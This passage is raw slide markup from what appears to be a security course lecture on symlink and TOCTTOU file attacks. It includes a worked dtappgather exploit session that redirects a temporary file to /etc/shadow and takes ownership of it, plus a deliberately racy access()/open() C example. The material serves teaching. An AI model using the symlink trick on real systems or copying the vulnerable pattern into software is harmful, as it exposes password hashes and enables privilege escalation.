              <a:t>Home-relative paths should never be used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78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 Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some applications check the path to a file (e.g., to verify that the file is under a certain directory) but not the nature of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By creating symbolic links an attacker can force an application to access files outside the intended path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an application creates a temporary file it might not check for its properties in the assumption that the file has been created with the correct privileges </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32365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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523269" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> utility was shipped with the Common Desktop Environment (CDE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses a directory with permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0555</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to create temporary files used by each login session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not checked for existence prior to the opening of the file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4627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326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326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326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dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	-r-------- 1 root other 1500 Dec 29 18:21 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% ln -s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>MakeDirectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appmanager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/generic-display-0: File exists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	-r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-x 1 user users 1500 Dec 29 18:21 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174516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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The type of file being referenced by a path should be checked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For unexpected types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For symbolic links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary files should not be predictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65300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8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TOCTTOU Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="622599" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker may race against the application by exploiting the gap between testing and accessing the file (time-of-check-to-time-of-use)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Check (t1): validity of assumption A on entity E is checked </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Use (t2): E is used, assuming A is still valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time-Of-Attack (t3): assumption A is invalidated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t1 &lt; t3 &lt; t2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data race condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conflicting accesses of multiple processes to shared data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At least one of them is a write access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137613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25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25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25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25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225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225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2259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225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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>TOCTTOU Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The access() system call returns an estimation of the access rights of the user specified by the real UID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The open() system call is executed using the effective UID</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>access(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, W_OK) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>open(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, O_WRONLY)) &lt; 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>perror(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
